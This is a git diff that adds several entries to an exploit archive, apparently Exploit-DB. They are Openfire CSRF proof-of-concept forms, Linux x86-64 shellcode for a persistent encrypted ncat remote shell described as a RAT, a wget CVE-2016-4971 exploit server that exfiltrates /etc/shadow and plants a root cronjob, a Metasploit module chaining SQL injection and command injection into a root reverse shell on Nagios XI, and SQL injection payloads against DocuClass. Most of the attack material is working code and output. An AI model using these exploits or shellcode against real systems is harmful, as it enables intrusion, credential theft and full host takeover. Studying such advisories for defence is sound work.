+ + +``` + + +#### *client-connections-settings.jsp* is vulerable to a CSRF attack. + +The following HTML iframe command allows reproducing the attack against the Openfire *client-connections-settings.jsp* page: + +``` + +
+ + + + + + + +
+ + +``` + +#### *manage-updates.jsp* is vulerable to a CSRF attack. + +The following HTML iframe command allows reproducing the attack against the *Openfire manage-updates.jsp* page: + +``` + +
+ + + + + + +
+ + +``` + +#### *plugin-admin.jsp* is vulerable to a CSRF attack. + +The following HTML iframe command allows reproducing the attack against the Openfire *plugin-admin.jsp* page. + +``` + +
+ +
+ + + +``` + +The following HTML iframe command allows reproducing the attack against the Openfire *reg-settings.jsp* page: + +``` + +
+ + + + + + +
+ + + +``` + +#### *server-properties.jsp* is vulerable to a CSRF attack. + +The following HTML iframe command allows reproducing the attack against the Openfire *server-properties.jsp* admin page. + +``` + +
+ + + + +
+ + +``` + +#### *system-email.jsp* is vulerable to a CSRF attack. + +The following HTML iframe command allows reproducing the attack against the Openfire *system-email.jsp* admin page. + +``` + +
+ + + + + + +
+``` + +### Affected versions + +* Version >= 3.10.2 and < 4.0.0 + + +## Several CSRF Vulnerabilities identified in Openfire 3.10.2 + +**Access Vector**: remote + +**Security Risk**: low + +**Vulnerability**: CWE-312 + +**CVSS Base Score**: 5.4 + +[comment]: https://www.first.org/cvss/calculator/3.0#CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:N/E:F/RL:O + +### Vulnerability Description + +Several CSRF vulnerabilities have been found on different pages of the admin panel of the OpenFire web server. Through this attack, an attacker could drive a valid user to execute unwittingly a request to the OpenFire sever. + +These vulnerabilities have already been found by hyp3rlinx, but had not been patched yet. + +### Proof of Concept + +#### *connection-settings-external-components.jsp* is vulerable to a CSRF attack. + +The following HTML iframe command allows reproducing the attack against the Openfire *dwr/exec/downloader.installPlugin.dwr* page: + +``` + +
+ + + + + +
+ + +``` + +#### *client-connections-settings.jsp* is vulerable to a CSRF attack. + +The following HTML iframe command allows reproducing the attack against the Openfire *client-connections-settings.jsp* page. + +``` + +
+ + + + +
+ + +``` + +### Affected versions + +* Version 4.0.0 and 4.0.1 + + +## Sensitive information disclosure in OpenFire Server <=3.10.2 + +**Access Vector**: remote + +**Security Risk**: low + +**Vulnerability**: CWE-200 + +**CVSS Base Score**: 5.5 + +[comment]: https://www.first.org/cvss/calculator/3.0#CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:L/A:N/E:F/RL:O + +### Vulnerability Description + +A sensitive information disclosure vulnerabilty is present in the page *system-email.jsp*. It allow's an authenticated user to retreive the md5 hash the password of an email account. + +### Vulnerable code + +The following HTML code is reveived by an authenticated user on the page system-email.jsp. The md5 hash of the password is sent to the user. + +``` + + + Server Username (Optional): + + + + + + + + Server Password (Optional): + + + + + +``` + + +### Affected versions + +* Version >=3.10.2 and <4.0.2 + +### Fixes + +* https://github.com/igniterealtime/Openfire/pull/570 + +### Solution + +Update to version 4.0.2 + +### Timeline (dd/mm/yyyy) + +* 15/10/2014 : Initial discovery +* 19/10/2015 : Contact with vendor team +* 27/11/2014 : vendor fixes vulnerabilities +* 27/11/2014 : vendor releases version 4.0.2, which includes the fixes + +## Credits + +* Florian Nivette + + + + +-- SYSDREAM Labs GPG : 47D1 E124 C43E F992 2A2E 1551 8EB4 8CD9 D5B2 59A1 * Website: https://sysdream.com/ * Twitter: @sysdream \ No newline at end of file diff --git a/platforms/lin_x86-64/shellcode/40061.c b/platforms/lin_x86-64/shellcode/40061.c new file mode 100755 index 000000000..8e05b5251 --- /dev/null +++ b/platforms/lin_x86-64/shellcode/40061.c @@ -0,0 +1,81 @@ +#include +#include + +// Exploit Title: [Linux 64bit Ncat + SSL + MultiChannel + Persistant + Fork + IPv4/6 + Password 176byte] +// Date: [7/5/2016] +// Exploit Author: [CripSlick] +// Tested on: [Kali 2.0] +// Version: [Ncat: Version 7.01] + +// ShepherdDowling@gmail.com +// OffSec ID: OS-20614 +// http://50.112.22.183/ + +//--------------------------------------------------------------------------------- +// ALERT TO SETTINGS: If Fork is ON and MultiChannel is ON, you will need to either +// kill the PID or restart the computer in order to remove the RAT. That is why +// password and encryption is VERY important here. +//--------------------------------------------------------------------------------- + +// Default Use +// ncat --ssl -6 1000::66 9999 --proxy-auth creepin[:LaCrips] -v + +// Any Use +// ncat --ssl -(4/6) (IPv4/IPv6) --proxy-auth [:] -v + +//--------------------------------------------------------------------------------- + + +// Internet Protocol Version +// IPv6 = \x36 +// IPv4 = \x34 +#define IP "\x36" + +// Username (Any Byte Size) +#define Username "\x63\x72\x65\x65\x70\x69\x6e" + +// Password (Any Byte Size) +#define Password "\x4c\x61\xee\x43\x72\x69\x70\x73\x5d" + +// Port (4 bytes) +// ascii (from 0 to 9) = 30, 31, 32, 33, 34, 35, 36, 37, 38, 39 +#define Port "\x39\x39\x39\x39" + + +// MultiChannel & Non-Ceasing (persistant until terminal close unless Fork is on) +// on = \x6b +// off = \x76 +#define MultiChannel "\x6b" + + +// Fork allows the program to run after terminal close (I suggest MultiChannel on) +// Fork helps when linking payload to an innocuous program +// comment the fork out if you don't want it +#define Fork "\x6a\x39\x58\x48\x31\xff\x0f\x05\x48\x31\xff\x48\x39\xf8\x74\x08\x48\x31\xc0\x6a\x3c\x58\x0f\x05" + + + +unsigned char code[] = + +"\x48\x31\xff\x48\xf7\xe7"Fork +"\x68\x2f\x6e\x63\x61\xc6\x44\x24\x04\x74\x48\xbf\x2f\x75\x73\x72\x2f\x62\x69\x6e\x57\x48\x89\xe7\x50\x68\x2d\x2d\x73\x73\xc6\x44\x24\x04\x6c\x49\x89\xe6\x50\x49\xbf\x2f\x2f\x62\x69\x6e\x2f\x73\x68\x41\x57\x49\x89\xe7\x68\x2d"MultiChannel"\x76\x65\x49\x89\xe3\xeb\x3b\x48\x89\xe3\x68\x61\x75\x74\x68\x48\xb9\x2d\x2d\x70\x72\x6f\x78\x79\x2d\x51\x48\x89\xe1\x68"Port"\x49\x89\xe5\x68\x2d\x6c"IP"\x70\x49\x89\xe2\x50\x41\x56\x41\x57\x41\x53\x53\x51\x41\x55\x41\x52\x57\x48\x89\xe6\xb0\x3b\x0f\x05\xe8\xc0\xff\xff\xff"Username"\x5b\x3a"Password +; + +int main () +{ + // I make sure there are no nulls + // The string count will terminate at the first \x00 + printf("The Shellcode is %d Bytes Long\n", strlen(code)); + + // Next I throw 0xAAAAAAAA into every register before shellcode execution + // This ensures that the shellcode will run in any circumstance + + __asm__("mov $0xAAAAAAAAAAAAAAAA, %rax\n\t" + "mov %rax, %rbx\n\t" "mov %rax, %rcx\n\t" "mov %rax, %rdx\n\t" + "mov %rax, %rsi\n\t" "mov %rax, %rdi\n\t" "mov %rax, %rbp\n\t" + "mov %rax, %r10\n\t" "mov %rax, %r11\n\t" "mov %rax, %r12\n\t" + "mov %rax, %r13\n\t" "mov %rax, %r14\n\t" "mov %rax, %r15\n\t" + "call code"); + return 0; +} + diff --git a/platforms/linux/remote/40064.txt b/platforms/linux/remote/40064.txt new file mode 100755 index 000000000..204d64854 --- /dev/null +++ b/platforms/linux/remote/40064.txt @@ -0,0 +1,495 @@ +============================================= +- Release date: 06.07.2016 +- Discovered by: Dawid Golunski +- Severity: High +- CVE-2016-4971 +============================================= + + +I. VULNERABILITY +------------------------- + +GNU Wget < 1.18 Arbitrary File Upload / Potential Remote Code Execution + + +II. BACKGROUND +------------------------- + +"GNU Wget is a free software package for retrieving files using HTTP, HTTPS and +FTP, the most widely-used Internet protocols. +It is a non-interactive commandline tool, so it may easily be called from +scripts, cron jobs, terminals without X-Windows support, etc. + +GNU Wget has many features to make retrieving large files or mirroring entire +web or FTP sites easy +" + +https://www.gnu.org/software/wget/ + + +III. INTRODUCTION +------------------------- + +GNU Wget before 1.18 when supplied with a malicious URL (to a malicious or +compromised web server) can be tricked into saving an arbitrary remote file +supplied by an attacker, with arbitrary contents and filename under +the current directory and possibly other directories by writing to .wgetrc. +Depending on the context in which wget is used, this can lead to remote code +execution and even root privilege escalation if wget is run via a root cronjob +as is often the case in many web application deployments. +The vulnerability could also be exploited by well-positioned attackers within +the network who are able to intercept/modify the network traffic. + + +IV. DESCRIPTION +------------------------- + +Because of lack of sufficient controls in wget, when user downloads a file +with wget, such as: + +wget http://attackers-server/safe_file.txt + +an attacker who controls the server could make wget create an arbitrary file +with an arbitrary contents and filename by issuing a crafted HTTP 30X Redirect +containing FTP server reference in response to the victim's wget request. + +For example, if the attacker's server replies with the following response: + +HTTP/1.1 302 Found +Cache-Control: private +Content-Type: text/html; charset=UTF-8 +Location: ftp://attackers-server/.bash_profile +Content-Length: 262 +Server: Apache + +wget will automatically follow the redirect and will download a malicious +.bash_profile file from a malicious FTP server. +It will fail to rename the file to the originally requested filename of +'safe_file.txt' as it would normally do, in case of a redirect to another +HTTP resource with a different name. + +Because of this vulnerability, an attacker is able to upload an arbitrary file +with an arbitrary filename to the victim's current directory. + +Execution flow: + +victim@trusty:~$ wget --version | head -n1 +GNU Wget 1.17 built on linux-gnu. + +victim@trusty:~$ pwd +/home/victim + +victim@trusty:~$ ls +victim@trusty:~$ + +victim@trusty:~$ wget http://attackers-server/safe-file.txt +Resolving attackers-server... 192.168.57.1 +Connecting to attackers-server|192.168.57.1|:80... connected. +HTTP request sent, awaiting response... 302 Found +Location: ftp://192.168.57.1/.bash_profile [following] + => ‘.bash_profile’ +Connecting to 192.168.57.1:21... connected. +Logging in as anonymous ... Logged in! +==> SYST ... done. ==> PWD ... done. +==> TYPE I ... done. ==> CWD not needed. +==> SIZE .bash_profile ... 55 +==> PASV ... done. ==> RETR .bash_profile ... done. +Length: 55 (unauthoritative) + +.bash_profile 100%[=============================================================================================>] 55 --.-KB/s in 0s + +2016-02-19 04:50:37 (1.27 MB/s) - ‘.bash_profile’ saved [55] + + +victim@trusty:~$ ls -l +total 4 +-rw-rw-r-- 1 victim victim 55 Feb 19 04:50 .bash_profile +victim@trusty:~$ + + +This vulnerability will not work if extra options that force destination +filename are specified as a paramter. Such as: -O /tmp/output +It is however possible to exploit the issue with mirroring/recursive options +enabled such as -r or -m. + +Another limitation is that attacker exploiting this vulnerability can only +upload his malicious file to the current directory from which wget was run, +or to a directory specified by -P option (directory_prefix option). +This could however be enough to exploit wget run from home directory, or +within web document root (in which case attacker could write malicious php files +or .bash_profile files). + +The current directory limitation could also be bypassed by uploading a .wgetrc +config file if wget was run from a home directory. + +By saving .wgetrc in /home/victim/.wgetrc an attacker could set arbitrary wget +settings such as destination directory for all downloaded files in future, +as well as set a proxy setting to make future requests go through a malicious +proxy server belonging to the attackers to which they could send further +malicious responses. + + +Here is a set of Wget settings that can be helpful to an attacker: + +dir_prefix = string + Top of directory tree—the same as ‘-P string’. + +post_file = file + Use POST as the method for all HTTP requests and send the contents of file in the request body. The same as ‘--post-file=file’. + +recursive = on/off + Recursive on/off—the same as ‘-r’. + +timestamping = on/off + Allows to overwrite existing files. + +cut_dirs = n + Ignore n remote directory components. Allows attacker to create directories with wget (when combined with recursive option). + +http_proxy + HTTP Proxy server + +https_proxy + HTTPS Proxy server + +output_document = file + Set the output filename—the same as ‘-O file’. + +input = file + Read the URLs from string, like ‘-i file’. + +metalink-over-http + Issues HTTP HEAD request instead of GET and extracts Metalink metadata from response headers. + Then it switches to Metalink download. If no valid Metalink metadata is found, it falls back to ordinary HTTP download. + + + +Full list of .wgetrc options can be found in: + +https://www.gnu.org/software/wget/manual/wget.html#Wgetrc-Commands + + + +V. PROOF OF CONCEPT EXPLOIT +------------------------- + + +1) Cronjob with wget scenario + +Often wget is used inside cronjobs. By default cronjobs run within home +directory of the cronjob owner. +Such wget cronjobs are commonly used with many applications used to download +new version of databases, requesting web scripts that perform scheduled tasks +such as rebuilding indexes, cleaning caches etc. +Here are a few example tutorials for Wordpress/Moodle/Joomla/Drupal found on +the Internet with exploitable wget cronjobs: + +https://codex.wordpress.org/Post_to_your_blog_using_email +https://docs.moodle.org/2x/ca/Cron +http://www.joomlablogger.net/joomla-tips/joomla-general-tips/how-to-set-up-a-content-delivery-network-cdn-for-your-joomla-site +http://www.zyxware.com/articles/4483/drupal-how-to-add-a-cron-job-via-cpanel + +Such setup could be abused by attackers to upload .bash_profile file through +wget vulnerability and run commands in the context of the victim user upon +their next log-in. + +As cron runs priodically attackers, could also write out .wgetrc file in the +first response and then write to /etc/cron.d/malicious-cron in the second. +If a cronjob is run by root, this would give them an almost instant root code +execution. + + +It is worth noting that if an attacker had access to local network they could +potentially modify unencrypted HTTP traffic to inject malicious 30X Redirect +responses to wget requests. + +This issue could also be exploited by attackers who have already gained +access to the server through a web vulnerability to escalate their privileges. +In many cases the cron jobs (as in examples above) are set up to request +various web scripts e.g: +http://localhost/clean-cache.php + +If the file was writable by apache, and attacker had access to www-data/apache +account, they could modify it to return malicious Location header and exploit +root cronjob that runs the wget request in order to escalate their privileges +to root. + + +For simplicity we can assume that attacker already has control over the server +that the victim sends the request to with wget. + +The root cronjob on the victim server may look as follows: + +root@victim:~# cat /etc/cron.d/update-database +# Update database file every 2 minutes +*/2 * * * * root wget -N http://attackers-server/database.db > /dev/null 2>&1 + + +In order to exploit this setup, attacker first prepares a malicious .wgetrc +and starts an FTP server: + +attackers-server# mkdir /tmp/ftptest +attackers-server# cd /tmp/ftptest + +attackers-server# cat <<_EOF_>.wgetrc +post_file = /etc/shadow +output_document = /etc/cron.d/wget-root-shell +_EOF_ + +attackers-server# sudo pip install pyftpdlib +attackers-server# python -m pyftpdlib -p21 -w + + +At this point attacker can start an HTTP server which will exploit wget by +sending malicious redirects to the victim wget's requests: + +---[ wget-exploit.py ]--- + +#!/usr/bin/env python + +# +# Wget 1.18 < Arbitrary File Upload Exploit +# Dawid Golunski +# dawid( at )legalhackers.com +# +# http://legalhackers.com/advisories/Wget-Arbitrary-File-Upload-Vulnerability-Exploit.txt +# +# CVE-2016-4971 +# + +import SimpleHTTPServer +import SocketServer +import socket; + +class wgetExploit(SimpleHTTPServer.SimpleHTTPRequestHandler): + def do_GET(self): + # This takes care of sending .wgetrc + + print "We have a volunteer requesting " + self.path + " by GET :)\n" + if "Wget" not in self.headers.getheader('User-Agent'): + print "But it's not a Wget :( \n" + self.send_response(200) + self.end_headers() + self.wfile.write("Nothing to see here...") + return + + print "Uploading .wgetrc via ftp redirect vuln. It should land in /root \n" + self.send_response(301) + new_path = '%s'%('ftp://anonymous@%s:%s/.wgetrc'%(FTP_HOST, FTP_PORT) ) + print "Sending redirect to %s \n"%(new_path) + self.send_header('Location', new_path) + self.end_headers() + + def do_POST(self): + # In here we will receive extracted file and install a PoC cronjob + + print "We have a volunteer requesting " + self.path + " by POST :)\n" + if "Wget" not in self.headers.getheader('User-Agent'): + print "But it's not a Wget :( \n" + self.send_response(200) + self.end_headers() + self.wfile.write("Nothing to see here...") + return + + content_len = int(self.headers.getheader('content-length', 0)) + post_body = self.rfile.read(content_len) + print "Received POST from wget, this should be the extracted /etc/shadow file: \n\n---[begin]---\n %s \n---[eof]---\n\n" % (post_body) + + print "Sending back a cronjob script as a thank-you for the file..." + print "It should get saved in /etc/cron.d/wget-root-shell on the victim's host (because of .wgetrc we injected in the GET first response)" + self.send_response(200) + self.send_header('Content-type', 'text/plain') + self.end_headers() + self.wfile.write(ROOT_CRON) + + print "\nFile was served. Check on /root/hacked-via-wget on the victim's host in a minute! :) \n" + + return + +HTTP_LISTEN_IP = '192.168.57.1' +HTTP_LISTEN_PORT = 80 +FTP_HOST = '192.168.57.1' +FTP_PORT = 21 + +ROOT_CRON = "* * * * * root /usr/bin/id > /root/hacked-via-wget \n" + +handler = SocketServer.TCPServer((HTTP_LISTEN_IP, HTTP_LISTEN_PORT), wgetExploit) + +print "Ready? Is your FTP server running?" + +sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) +result = sock.connect_ex((FTP_HOST, FTP_PORT)) +if result == 0: + print "FTP found open on %s:%s. Let's go then\n" % (FTP_HOST, FTP_PORT) +else: + print "FTP is down :( Exiting." + exit(1) + +print "Serving wget exploit on port %s...\n\n" % HTTP_LISTEN_PORT + +handler.serve_forever() + + +---[ eof ]--- + + + +Attacker can run wget-exploit.py and wait a few minutes until the victim's server executes +the aforementioned cronjob with wget. + +The output should look similar to: + + +---[ wget-exploit.py output ]--- + +attackers-server# python ./wget-exploit.py + +Ready? Is your FTP server running? +FTP found open on 192.168.57.1:21. Let's go then + +Serving wget exploit on port 80... + + +We have a volunteer requesting /database.db by GET :) + +Uploading .wgetrc via ftp redirect vuln. It should land in /root + +192.168.57.10 - - [26/Feb/2016 15:03:54] "GET /database.db HTTP/1.1" 301 - +Sending redirect to ftp://anonymous@192.168.57.1:21/.wgetrc + +We have a volunteer requesting /database.db by POST :) + +Received POST from wget, this should be the extracted /etc/shadow file: + +---[begin]--- +root:$6$FsAu5RlS$b2J9GDm.....cut......9P19Nb./Y75nypB4FXXzX/:16800:0:99999:7::: +daemon:*:16484:0:99999:7::: +bin:*:16484:0:99999:7::: +sys:*:16484:0:99999:7::: +sync:*:16484:0:99999:7::: +games:*:16484:0:99999:7::: +man:*:16484:0:99999:7::: +lp:*:16484:0:99999:7::: +...cut... +---[eof]--- + +Sending back a cronjob script as a thank-you for the file... +It should get saved in /etc/cron.d/wget-root-shell on the victim's host (because of .wgetrc we injected in the GET first response) +192.168.57.10 - - [26/Feb/2016 15:05:54] "POST /database.db HTTP/1.1" 200 - + +File was served. Check on /root/hacked-via-wget on the victim's host in a minute! :) + +---[ output eof ]--- + + +As we can see .wgetrc got uploaded by the exploit. It has set the post_file +setting to /etc/shadow. +Therefore, on the next wget run, wget sent back shadow file to the attacker. +It also saved the malicious cronjob script (ROOT_CRON variable) which should +create a file named /root/hacked-via-wget, which we can verify on the victim's +server: + + +root@victim:~# cat /etc/cron.d/wget-root-shell +* * * * * root /usr/bin/id > /root/hacked-via-wget + +root@victim:~# cat /root/hacked-via-wget +uid=0(root) gid=0(root) groups=0(root) + + + +2) PHP web application scenario + +If wget is used within a PHP script e.g.: + + + +An attacker who manages to respond to the request could simply upload a PHP +backdoor of: + + + +by using the wget-exploit script described in example 1. + +After the upload he could simply execute the script and their shell +command by a GET request to: + +http://victims-php-host/geoip/webshell.php?cmd=id + + +VI. BUSINESS IMPACT +------------------------- + +Affected versions of wget that connect to untrusted (or compromised) web +servers could be tricked into uploading a file under an arbitrary name, or +even path (if wget is run from a home directory). +Depending on the context in which wget is used, this could lead to +uploading a web shell and granting the attacker access remote access to the +system, or privilege escalation. It could be possible for attackers to escalate +to root user if wget is run via root cronjob as it is often the case in web +application deployments and is recommended in some guides on the Internet. + +The vulnerability could also be exploited by well-positioned attackers within +the networ who are able to intercept/modify the network traffic. + + +VII. SYSTEMS AFFECTED +------------------------- + +All versions of Wget before the patched version of 1.18 are affected. + +VIII. SOLUTION +------------------------- + +Update to wget version 1.18 as advertised by the vendor at: + +http://lists.gnu.org/archive/html/info-gnu/2016-06/msg00004.html + +Linux distributions should update their wget packages. It is recommended +to update wget manually if an updated package is not available for your +distribution. + +IX. REFERENCES +------------------------- + +http://legalhackers.com + +http://legalhackers.com/advisories/Wget-Arbitrary-File-Upload-Vulnerability-Exploit.txt + +http://lists.gnu.org/archive/html/info-gnu/2016-06/msg00004.html + +http://www.ubuntu.com/usn/usn-3012-1/ + +https://bugzilla.redhat.com/show_bug.cgi?id=1343666#c1 + +https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-4971 + +X. CREDITS +------------------------- + +The vulnerability has been discovered by Dawid Golunski +dawid (at) legalhackers (dot) com +legalhackers.com + +XI. REVISION HISTORY +------------------------- + +06.07.2016 - Advisory released + +XII. LEGAL NOTICES +------------------------- + +The information contained within this advisory is supplied "as-is" with +no warranties or guarantees of fitness of use or otherwise. I accept no +responsibility for any damage caused by the use or misuse of this information. + diff --git a/platforms/linux/remote/40067.rb b/platforms/linux/remote/40067.rb new file mode 100755 index 000000000..b175ad956 --- /dev/null +++ b/platforms/linux/remote/40067.rb @@ -0,0 +1,275 @@ +## +# This module requires Metasploit: http://metasploit.com/download +# Current source: https://github.com/rapid7/metasploit-framework +## + +class MetasploitModule < Msf::Exploit::Remote + + Rank = ExcellentRanking + + include Msf::Exploit::Remote::HttpClient + + def initialize(info = {}) + super(update_info(info, + 'Name' => 'Nagios XI Chained Remote Code Execution', + 'Description' => %q{ + This module exploits an SQL injection, auth bypass, file upload, + command injection, and privilege escalation in Nagios XI <= 5.2.7 + to pop a root shell. + }, + 'Author' => [ + 'Francesco Oddo', # Vulnerability discovery + 'wvu' # Metasploit module + ], + 'References' => [ + ['EDB', '39899'] + ], + 'DisclosureDate' => 'Mar 6 2016', + 'License' => MSF_LICENSE, + 'Platform' => 'unix', + 'Arch' => ARCH_CMD, + 'Privileged' => true, + 'Payload' => { + 'Compat' => { + 'PayloadType' => 'cmd cmd_bash', + 'RequiredCmd' => 'generic bash-tcp php perl python openssl gawk' + } + }, + 'Targets' => [ + ['Nagios XI <= 5.2.7', version: Gem::Version.new('5.2.7')] + ], + 'DefaultTarget' => 0, + 'DefaultOptions' => { + 'PAYLOAD' => 'cmd/unix/reverse_bash', + 'LHOST' => Rex::Socket.source_address + } + )) + end + + def check + res = send_request_cgi!( + 'method' => 'GET', + 'uri' => '/nagiosxi/' + ) + + return unless res && (html = res.get_html_document) + + if (version = html.at('//input[@name = "version"]/@value')) + vprint_status("Nagios XI version: #{version}") + if Gem::Version.new(version) <= target[:version] + return CheckCode::Appears + end + end + + CheckCode::Safe + end + + def exploit + if check != CheckCode::Appears + fail_with(Failure::NotVulnerable, 'Vulnerable version not found! punt!') + end + + print_status('Getting API token') + get_api_token + print_status('Getting admin cookie') + get_admin_cookie + print_status('Getting monitored host') + get_monitored_host + + print_status('Downloading component') + download_profile_component + print_status('Uploading root shell') + upload_root_shell + print_status('Popping shell!') + pop_dat_shell + end + + # + # Cleanup methods + # + + def on_new_session(session) + super + + print_status('Cleaning up...') + + commands = [ + 'rm -rf ../profile', + 'unzip -qd .. ../../../../tmp/component-profile.zip', + 'chown -R nagios:nagios ../profile', + "rm -f ../../../../tmp/component-#{zip_filename}" + ] + + commands.each do |command| + vprint_status(command) + session.shell_command_token(command) + end + end + + # + # Exploit methods + # + + def get_api_token + res = send_request_cgi( + 'method' => 'GET', + 'uri' => '/nagiosxi/includes/components/nagiosim/nagiosim.php', + 'vars_get' => { + 'mode' => 'resolve', + 'host' => '\'AND(SELECT 1 FROM(SELECT COUNT(*),CONCAT((' \ + 'SELECT backend_ticket FROM xi_users WHERE user_id=1' \ + '),FLOOR(RAND(0)*2))x ' \ + 'FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)-- ' + } + ) + + if res && res.body =~ /Duplicate entry '(.*?).'/ + @api_token = $1 + vprint_good("API token: #{@api_token}") + else + fail_with(Failure::UnexpectedReply, 'API token not found! punt!') + end + end + + def get_admin_cookie + res = send_request_cgi( + 'method' => 'GET', + 'uri' => '/nagiosxi/rr.php', + 'vars_get' => { + 'uid' => "1-#{Rex::Text.rand_text_alpha(8)}-" + + Digest::MD5.hexdigest(@api_token) + } + ) + + if res && (@admin_cookie = res.get_cookies.split('; ').last) + vprint_good("Admin cookie: #{@admin_cookie}") + get_csrf_token(res.body) + else + fail_with(Failure::NoAccess, 'Admin cookie not found! punt!') + end + end + + def get_csrf_token(body) + if body =~ /nsp_str = "(.*?)"/ + @csrf_token = $1 + vprint_good("CSRF token: #{@csrf_token}") + else + fail_with(Failure::UnexpectedReply, 'CSRF token not found! punt!') + end + end + + def get_monitored_host + res = send_request_cgi( + 'method' => 'GET', + 'uri' => '/nagiosxi/ajaxhelper.php', + 'cookie' => @admin_cookie, + 'vars_get' => { + 'cmd' => 'getxicoreajax', + 'opts' => '{"func":"get_hoststatus_table"}', + 'nsp' => @csrf_token + } + ) + + return unless res && (html = res.get_html_document) + + if (@monitored_host = html.at('//div[@class = "hostname"]/a/text()')) + vprint_good("Monitored host: #{@monitored_host}") + else + fail_with(Failure::UnexpectedReply, 'Monitored host not found! punt!') + end + end + + def download_profile_component + res = send_request_cgi( + 'method' => 'GET', + 'uri' => '/nagiosxi/admin/components.php', + 'cookie' => @admin_cookie, + 'vars_get' => { + 'download' => 'profile' + } + ) + + if res && res.body =~ /^PK\x03\x04/ + @profile_component = res.body + else + fail_with(Failure::UnexpectedReply, 'Failed to download component! punt!') + end + end + + def upload_root_shell + mime = Rex::MIME::Message.new + mime.add_part(@csrf_token, nil, nil, 'form-data; name="nsp"') + mime.add_part('1', nil, nil, 'form-data; name="upload"') + mime.add_part('1000000', nil, nil, 'form-data; name="MAX_FILE_SIZE"') + mime.add_part(payload_zip, 'application/zip', 'binary', + 'form-data; name="uploadedfile"; ' \ + "filename=\"#{zip_filename}\"") + + res = send_request_cgi!( + 'method' => 'POST', + 'uri' => '/nagiosxi/admin/components.php', + 'cookie' => @admin_cookie, + 'ctype' => "multipart/form-data; boundary=#{mime.bound}", + 'data' => mime.to_s + ) + + if res && res.code != 200 + if res.redirect? && res.redirection.path == '/nagiosxi/install.php' + vprint_warning('Nagios XI not configured') + else + fail_with(Failure::PayloadFailed, 'Failed to upload root shell! punt!') + end + end + end + + def pop_dat_shell + send_request_cgi( + 'method' => 'GET', + 'uri' => '/nagiosxi/includes/components/perfdata/graphApi.php', + 'cookie' => @admin_cookie, + 'vars_get' => { + 'host' => @monitored_host, + 'end' => ';sudo ../profile/getprofile.sh #' + } + ) + end + + # + # Support methods + # + + def payload_zip + zip = Rex::Zip::Archive.new + + Zip::File.open_buffer(@profile_component) do |z| + z.each do |f| + zip.entries << Rex::Zip::Entry.new( + f.name, + (if f.ftype == :file + if f.name == 'profile/getprofile.sh' + payload.encoded + else + z.read(f) + end + else + '' + end), + Rex::Zip::CM_DEFLATE, + nil, + (Rex::Zip::EFA_ISDIR if f.ftype == :directory) + ) + end + end + + zip.pack + end + + # + # Utility methods + # + + def zip_filename + @zip_filename ||= Rex::Text.rand_text_alpha(8) + '.zip' + end + +end \ No newline at end of file diff --git a/platforms/php/webapps/40058.txt b/platforms/php/webapps/40058.txt index 30405c510..961591a3a 100755 --- a/platforms/php/webapps/40058.txt +++ b/platforms/php/webapps/40058.txt @@ -1,3 +1,6 @@ +Advisory ID: ZSL-2016-5336 +Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2016-5336.php + eCardMAX 10.5 SQL Injection and XSS Vulnerabilities diff --git a/platforms/php/webapps/40059.txt b/platforms/php/webapps/40059.txt new file mode 100755 index 000000000..fad9bbc89 --- /dev/null +++ b/platforms/php/webapps/40059.txt @@ -0,0 +1,62 @@ +# Exploit Title: [CIMA DocuClass Enterprise Content Management - Multiple Vulnerabilities] +# Date: [July 15, 2016] +# Exploit Author: [Karn Ganeshen (ipositivesecurity.blogspot.com)] +# Vendor Homepage: [cima-software.com] +# Version: [app version] (All) +# Tested on: [Microsoft Windows 2008 R2] + +DocuClass is a modular and scalable enterprise content management (ECM) solution that allows organizations to streamline internal operations by significantly improving the way they manage their information within a business process. + +Vulnerability Details + +1. SQL Injection [Post Auth] + +PoC + +Vulnerable URLs & parameters: + +A: POST request +/dcrpcserver.php [parameter - uid] +--- +Parameter: uid (POST) + Type: boolean-based blind + Title: PostgreSQL boolean-based blind - Parameter replace + Payload: cmd=searchform&action=getsavedqueries&node=&uid=(SELECT (CASE WHEN (7877=7877) THEN 7877 ELSE 1/(SELECT 0) END)) +--- +web server operating system: Windows 2008 R2 or 7 +web application technology: ASP.NET, Microsoft IIS 7.5, PHP 5.2.5 +back-end DBMS: Microsoft SQL Server 2008 + +Impact +An unauthenticated attacker can read or modify data in the application database, execute code, and compromise the host system. + +B: GET request +/e-forms/dcformsserver.exe?action=createimagepdf&documentid=1408648&userid=755 [parameter - userid] + + +2. Access Control Flaws +DocuClass web application does not enforce strict access control. + +PoC: +http://IP/medical_records/0000001337/0000000000123456.pdf + +Dump all the documents with a bit of scripting. + +Impact +An unauthenticated user can access stored documents by directly calling the document url. + +3. Cross-Site Scripting + +DocuClass web application lacks strong input validation, and multiple urls & parameters are vulnerable to cross-site scripting (CWE-79) attacks. + +/e-forms/dcformsserver.exe [action parameter] +/e-forms/dcformsserver.exe [documentid parameter] +/e-forms/dcformsserver.exe [userid parameter] +/reports_server.php [cmd parameter] +/reports_server.php [reportid parameter] +/reports_server.php [uid parameter] + +Impact +An attacker may be able to execute arbitrary scripts/code in the context of the user's browser. + ++++++ \ No newline at end of file diff --git a/platforms/php/webapps/40062.txt b/platforms/php/webapps/40062.txt new file mode 100755 index 000000000..2f3f6d534 --- /dev/null +++ b/platforms/php/webapps/40062.txt @@ -0,0 +1,100 @@ +AWBS v2.9.6 Multiple Remote Vulnerabilities + + +Vendor: Total Online Solutions, Inc. +Product web page: http://www.awbs.com +Affected version: 2.9.6 +Platform: PHP + +Summary: Whether starting new or looking to expand your +existing web hosting and/or domain registration business, +the AWBS fully automated solutions and unique features will +allow you achieve your goal with minimum effort and cost. + +Desc: AWBS suffers from multiple SQL Injection vulnerabilities. +Input passed via the 'cat' and 'so' GET parameters are not properly +sanitised before being returned to the user or used in SQL queries. +This can be exploited to manipulate SQL queries by injecting arbitrary +SQL code. Multiple cross-site scripting vulnerabilities were also +discovered. The issue is triggered when input passed via multiple +parameters is not properly sanitized before being returned to the +user. This can be exploited to execute arbitrary HTML and script +code in a user's browser session in context of an affected site. + +Tested on: Apache + PHP/5.3.28 + MySQL/5.5.50-cll + + +Vulnerability discovered by Bikramaditya Guha aka "PhoenixX" + @zeroscience + + +Advisory ID: ZSL-2016-5337 +Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2016-5337.php + + +08.06.2016 + +-- + + +1. SQL Injection: +----------------- + +Parameter: cat, so (GET) +POC URL: 